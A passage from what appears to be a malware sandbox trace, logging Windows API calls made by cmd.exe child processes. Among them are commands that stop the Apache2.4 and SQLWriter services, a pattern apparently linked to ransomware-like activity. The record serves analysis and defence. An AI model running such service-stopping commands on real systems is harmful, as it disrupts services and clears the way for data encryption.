[0069.432] GetProcessHeap () returned 0x570000 [0069.432] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x210) returned 0x583068 [0069.432] GetProcessHeap () returned 0x570000 [0069.432] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x30) returned 0x583280 [0069.432] _wcsnicmp (_String1="net", _String2="cmd ", _MaxCount=0x4) returned 11 [0069.433] GetProcessHeap () returned 0x570000 [0069.433] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x418) returned 0x5707f0 [0069.433] SetErrorMode (uMode=0x0) returned 0x0 [0069.433] SetErrorMode (uMode=0x1) returned 0x0 [0069.433] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x5707f8, lpFilePart=0x2af570 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2af570*="Desktop") returned 0x25 [0069.433] SetErrorMode (uMode=0x0) returned 0x1 [0069.433] GetProcessHeap () returned 0x570000 [0069.433] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5707f0, Size=0x5c) returned 0x5707f0 [0069.433] GetProcessHeap () returned 0x570000 [0069.433] RtlSizeHeap (HeapHandle=0x570000, Flags=0x0, MemoryPointer=0x5707f0) returned 0x5c [0069.433] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0069.433] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0069.433] GetProcessHeap () returned 0x570000 [0069.433] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x120) returned 0x5832b8 [0069.433] GetProcessHeap () returned 0x570000 [0069.433] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x238) returned 0x570858 [0069.440] GetProcessHeap () returned 0x570000 [0069.440] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x570858, Size=0x122) returned 0x570858 [0069.440] GetProcessHeap () returned 0x570000 [0069.440] RtlSizeHeap (HeapHandle=0x570000, Flags=0x0, MemoryPointer=0x570858) returned 0x122 [0069.440] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0069.440] GetProcessHeap () returned 0x570000 [0069.440] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0xe0) returned 0x5833e0 [0069.440] GetProcessHeap () returned 0x570000 [0069.440] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5833e0, Size=0x76) returned 0x5833e0 [0069.440] GetProcessHeap () returned 0x570000 [0069.440] RtlSizeHeap (HeapHandle=0x570000, Flags=0x0, MemoryPointer=0x5833e0) returned 0x76 [0069.441] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0069.441] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x2af2ec, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2af2ec) returned 0xffffffff [0069.441] GetLastError () returned 0x2 [0069.441] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x2af2ec, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2af2ec) returned 0xffffffff [0069.442] GetLastError () returned 0x2 [0069.442] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0069.442] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x2af2ec, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2af2ec) returned 0x583460 [0069.442] GetProcessHeap () returned 0x570000 [0069.442] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x14) returned 0x5834a0 [0069.442] FindClose (in: hFindFile=0x583460 | out: hFindFile=0x583460) returned 1 [0069.442] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x2af2ec, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2af2ec) returned 0xffffffff [0069.442] GetLastError () returned 0x2 [0069.442] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x2af2ec, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2af2ec) returned 0x583460 [0069.442] GetProcessHeap () returned 0x570000 [0069.442] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5834a0, Size=0x4) returned 0x5834a0 [0069.442] FindClose (in: hFindFile=0x583460 | out: hFindFile=0x583460) returned 1 [0069.442] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0069.442] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0069.442] GetConsoleTitleW (in: lpConsoleTitle=0x2af7e4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0069.443] InitializeProcThreadAttributeList (in: lpAttributeList=0x2af66c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2af734 | out: lpAttributeList=0x2af66c, lpSize=0x2af734) returned 1 [0069.443] UpdateProcThreadAttribute (in: lpAttributeList=0x2af66c, dwFlags=0x0, Attribute=0x60001, lpValue=0x2af72c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2af66c, lpPreviousValue=0x0) returned 1 [0069.443] GetStartupInfoW (in: lpStartupInfo=0x2af628 | out: lpStartupInfo=0x2af628*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0069.443] GetProcessHeap () returned 0x570000 [0069.443] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x18) returned 0x583460 [0069.443] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0069.443] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0069.443] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0069.443] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0069.443] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0069.443] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0069.443] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0069.443] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0069.443] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0069.443] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0069.443] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0069.443] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0069.443] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0069.443] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0069.443] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0069.443] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0069.443] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0069.443] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.443] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.443] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.443] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.443] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.443] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0069.443] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0069.443] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0069.443] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0069.443] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0069.443] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0069.444] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0069.444] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0069.444] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0069.444] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0069.444] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0069.444] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0069.444] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0069.444] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0069.444] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0069.444] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0069.444] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0069.444] GetProcessHeap () returned 0x570000 [0069.444] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x583460 | out: hHeap=0x570000) returned 1 [0069.444] GetProcessHeap () returned 0x570000 [0069.444] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0xa) returned 0x57ff18 [0069.444] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0069.445] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop Apache2.4", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x2af6c8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop Apache2.4", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2af714 | out: lpCommandLine="net stop Apache2.4", lpProcessInformation=0x2af714*(hProcess=0x78, hThread=0x74, dwProcessId=0x7cc, dwThreadId=0xa0c)) returned 1 [0069.449] CloseHandle (hObject=0x74) returned 1 [0069.449] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0069.449] GetProcessHeap () returned 0x570000 [0069.449] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x585ef8 | out: hHeap=0x570000) returned 1 [0069.449] GetEnvironmentStringsW () returned 0x585ef8* [0069.450] GetProcessHeap () returned 0x570000 [0069.450] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0xb36) returned 0x5840b8 [0069.450] FreeEnvironmentStringsW (penv=0x585ef8) returned 1 [0069.450] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0072.290] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x2af608 | out: lpExitCode=0x2af608*=0x2) returned 1 [0072.290] CloseHandle (hObject=0x78) returned 1 [0072.291] _vsnwprintf (in: _Buffer=0x2af750, _BufferCount=0x13, _Format="%08X", _ArgList=0x2af614 | out: _Buffer="00000002") returned 8 [0072.291] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0072.291] GetProcessHeap () returned 0x570000 [0072.291] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5840b8 | out: hHeap=0x570000) returned 1 [0072.291] GetEnvironmentStringsW () returned 0x5840b8* [0072.291] GetProcessHeap () returned 0x570000 [0072.291] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0xb5c) returned 0x5895a0 [0072.291] FreeEnvironmentStringsW (penv=0x5840b8) returned 1 [0072.291] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0072.291] GetProcessHeap () returned 0x570000 [0072.291] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5895a0 | out: hHeap=0x570000) returned 1 [0072.291] GetEnvironmentStringsW () returned 0x5840b8* [0072.291] GetProcessHeap () returned 0x570000 [0072.291] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0xb5c) returned 0x5895a0 [0072.291] FreeEnvironmentStringsW (penv=0x5840b8) returned 1 [0072.291] GetProcessHeap () returned 0x570000 [0072.291] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x57ff18 | out: hHeap=0x570000) returned 1 [0072.291] DeleteProcThreadAttributeList (in: lpAttributeList=0x2af66c | out: lpAttributeList=0x2af66c) [0072.292] _get_osfhandle (_FileHandle=1) returned 0x7 [0072.292] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0072.292] _get_osfhandle (_FileHandle=1) returned 0x7 [0072.292] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49f041ac | out: lpMode=0x49f041ac) returned 1 [0072.292] _get_osfhandle (_FileHandle=0) returned 0x3 [0072.292] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49f041b0 | out: lpMode=0x49f041b0) returned 1 [0072.292] SetConsoleInputExeNameW () returned 0x1 [0072.292] GetConsoleOutputCP () returned 0x1b5 [0072.293] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0072.293] SetThreadUILanguage (LangId=0x0) returned 0x409 [0072.293] exit (_Code=2) Process: id = "29" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x1e80000" os_pid = "0x850" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa18" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c net stop SQLWriter" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 52 os_tid = 0x854 [0068.954] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x37f864 | out: lpSystemTimeAsFileTime=0x37f864*(dwLowDateTime=0x97f1c730, dwHighDateTime=0x1d57b18)) [0068.954] GetCurrentProcessId () returned 0x850 [0068.954] GetCurrentThreadId () returned 0x854 [0068.954] GetTickCount () returned 0x114b349 [0068.954] QueryPerformanceCounter (in: lpPerformanceCount=0x37f85c | out: lpPerformanceCount=0x37f85c*=18917531642) returned 1 [0068.955] GetModuleHandleA (lpModuleName=0x0) returned 0x49ee0000 [0068.955] __set_app_type (_Type=0x1) [0068.955] __p__fmode () returned 0x74eb31f4 [0068.955] __p__commode () returned 0x74eb31fc [0068.955] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49f021a6) returned 0x0 [0068.955] __getmainargs (in: _Argc=0x49f04238, _Argv=0x49f04240, _Env=0x49f0423c, _DoWildCard=0, _StartInfo=0x49f04140 | out: _Argc=0x49f04238, _Argv=0x49f04240, _Env=0x49f0423c) returned 0 [0068.955] GetCurrentThreadId () returned 0x854 [0068.955] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x854) returned 0x60 [0068.956] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0068.956] GetProcAddress (hModule=0x76c20000, lpProcName="SetThreadUILanguage") returned 0x76c4a84f [0068.956] SetThreadUILanguage (LangId=0x0) returned 0x409 [0068.956] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0068.956] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x37f7f4 | out: phkResult=0x37f7f4*=0x0) returned 0x2 [0068.956] VirtualQuery (in: lpAddress=0x37f82b, lpBuffer=0x37f7c4, dwLength=0x1c | out: lpBuffer=0x37f7c4*(BaseAddress=0x37f000, AllocationBase=0x280000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0068.956] VirtualQuery (in: lpAddress=0x280000, lpBuffer=0x37f7c4, dwLength=0x1c | out: lpBuffer=0x37f7c4*(BaseAddress=0x280000, AllocationBase=0x280000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0068.956] VirtualQuery (in: lpAddress=0x281000, lpBuffer=0x37f7c4, dwLength=0x1c | out: lpBuffer=0x37f7c4*(BaseAddress=0x281000, AllocationBase=0x280000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0068.956] VirtualQuery (in: lpAddress=0x283000, lpBuffer=0x37f7c4, dwLength=0x1c | out: lpBuffer=0x37f7c4*(BaseAddress=0x283000, AllocationBase=0x280000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0068.956] VirtualQuery (in: lpAddress=0x380000, lpBuffer=0x37f7c4, dwLength=0x1c | out: lpBuffer=0x37f7c4*(BaseAddress=0x380000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x30000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0068.956] GetConsoleOutputCP () returned 0x1b5 [0068.956] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0068.957] SetConsoleCtrlHandler (HandlerRoutine=0x49efe72a, Add=1) returned 1 [0068.957] _get_osfhandle (_FileHandle=1) returned 0x7 [0068.957] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0068.957] _get_osfhandle (_FileHandle=1) returned 0x7 [0068.957] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49f041ac | out: lpMode=0x49f041ac) returned 1 [0068.957] _get_osfhandle (_FileHandle=1) returned 0x7 [0068.957] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0068.957] _get_osfhandle (_FileHandle=0) returned 0x3 [0068.957] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49f041b0 | out: lpMode=0x49f041b0) returned 1 [0068.958] _get_osfhandle (_FileHandle=0) returned 0x3 [0068.958] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0068.958] GetEnvironmentStringsW () returned 0x3c2030* [0068.958] GetProcessHeap () returned 0x3b0000 [0068.958] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xaca) returned 0x3c2b08 [0068.958] FreeEnvironmentStringsW (penv=0x3c2030) returned 1 [0068.958] GetProcessHeap () returned 0x3b0000 [0068.958] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x4) returned 0x3c0c60 [0068.958] GetEnvironmentStringsW () returned 0x3c2030* [0068.958] GetProcessHeap () returned 0x3b0000 [0068.958] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xaca) returned 0x3c35e0 [0068.959] FreeEnvironmentStringsW (penv=0x3c2030) returned 1 [0068.959] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x37e764 | out: phkResult=0x37e764*=0x68) returned 0x0 [0068.959] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x37e76c, lpData=0x37e770, lpcbData=0x37e768*=0x1000 | out: lpType=0x37e76c*=0x0, lpData=0x37e770*=0x0, lpcbData=0x37e768*=0x1000) returned 0x2 [0068.959] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x37e76c, lpData=0x37e770, lpcbData=0x37e768*=0x1000 | out: lpType=0x37e76c*=0x4, lpData=0x37e770*=0x1, lpcbData=0x37e768*=0x4) returned 0x0 [0068.959] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x37e76c, lpData=0x37e770, lpcbData=0x37e768*=0x1000 | out: lpType=0x37e76c*=0x0, lpData=0x37e770*=0x1, lpcbData=0x37e768*=0x1000) returned 0x2 [0068.959] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x37e76c, lpData=0x37e770, lpcbData=0x37e768*=0x1000 | out: lpType=0x37e76c*=0x4, lpData=0x37e770*=0x0, lpcbData=0x37e768*=0x4) returned 0x0 [0068.959] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x37e76c, lpData=0x37e770, lpcbData=0x37e768*=0x1000 | out: lpType=0x37e76c*=0x4, lpData=0x37e770*=0x40, lpcbData=0x37e768*=0x4) returned 0x0 [0068.959] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x37e76c, lpData=0x37e770, lpcbData=0x37e768*=0x1000 | out: lpType=0x37e76c*=0x4, lpData=0x37e770*=0x40, lpcbData=0x37e768*=0x4) returned 0x0 [0068.959] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x37e76c, lpData=0x37e770, lpcbData=0x37e768*=0x1000 | out: lpType=0x37e76c*=0x0, lpData=0x37e770*=0x40, lpcbData=0x37e768*=0x1000) returned 0x2 [0068.959] RegCloseKey (hKey=0x68) returned 0x0 [0068.959] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x37e764 | out: phkResult=0x37e764*=0x68) returned 0x0 [0068.959] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x37e76c, lpData=0x37e770, lpcbData=0x37e768*=0x1000 | out: lpType=0x37e76c*=0x0, lpData=0x37e770*=0x40, lpcbData=0x37e768*=0x1000) returned 0x2 [0068.959] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x37e76c, lpData=0x37e770, lpcbData=0x37e768*=0x1000 | out: lpType=0x37e76c*=0x4, lpData=0x37e770*=0x1, lpcbData=0x37e768*=0x4) returned 0x0 [0068.959] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x37e76c, lpData=0x37e770, lpcbData=0x37e768*=0x1000 | out: lpType=0x37e76c*=0x0, lpData=0x37e770*=0x1, lpcbData=0x37e768*=0x1000) returned 0x2 [0068.959] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x37e76c, lpData=0x37e770, lpcbData=0x37e768*=0x1000 | out: lpType=0x37e76c*=0x4, lpData=0x37e770*=0x0, lpcbData=0x37e768*=0x4) returned 0x0 [0068.959] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x37e76c, lpData=0x37e770, lpcbData=0x37e768*=0x1000 | out: lpType=0x37e76c*=0x4, lpData=0x37e770*=0x9, lpcbData=0x37e768*=0x4) returned 0x0 [0068.959] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x37e76c, lpData=0x37e770, lpcbData=0x37e768*=0x1000 | out: lpType=0x37e76c*=0x4, lpData=0x37e770*=0x9, lpcbData=0x37e768*=0x4) returned 0x0 [0068.960] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x37e76c, lpData=0x37e770, lpcbData=0x37e768*=0x1000 | out: lpType=0x37e76c*=0x0, lpData=0x37e770*=0x9, lpcbData=0x37e768*=0x1000) returned 0x2 [0068.960] RegCloseKey (hKey=0x68) returned 0x0 [0068.960] time (in: timer=0x0 | out: timer=0x0) returned 0x5d97ebb3 [0068.960] srand (_Seed=0x5d97ebb3) [0068.960] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c net stop SQLWriter" [0068.960] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c net stop SQLWriter" [0068.960] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49f05260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0068.960] GetProcessHeap () returned 0x3b0000 [0068.960] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x210) returned 0x3c2030 [0068.960] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3c2038, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0068.960] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0068.960] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0068.960] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0068.960] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0068.960] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0068.960] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0068.960] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0068.961] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0068.961] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0068.961] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0068.961] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0068.961] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0068.961] GetProcessHeap () returned 0x3b0000 [0068.961] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3c2b08 | out: hHeap=0x3b0000) returned 1 [0068.961] GetEnvironmentStringsW () returned 0x3c2248* [0068.961] GetProcessHeap () returned 0x3b0000 [0068.961] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xae2) returned 0x3c4ba8 [0068.961] FreeEnvironmentStringsW (penv=0x3c2248) returned 1 [0068.961] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0068.961] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0068.961] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0068.961] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0068.961] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0068.961] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0068.961] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0068.961] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0068.961] _wcsicmp (_String1="KEYS", 